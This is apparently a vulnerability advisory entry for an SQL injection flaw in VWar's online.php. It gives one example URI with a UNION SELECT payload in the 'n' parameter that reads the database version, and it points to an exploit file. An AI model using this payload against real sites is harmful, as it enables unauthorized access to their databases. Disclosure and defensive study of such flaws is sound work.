• info
• discussion
• exploit
• solution
• references

VWar Online.PHP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

An example URIs has been provided:

http://www.example.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*

• /data/vulnerabilities/exploits/vwar-llteqv1.50r14-sql.txt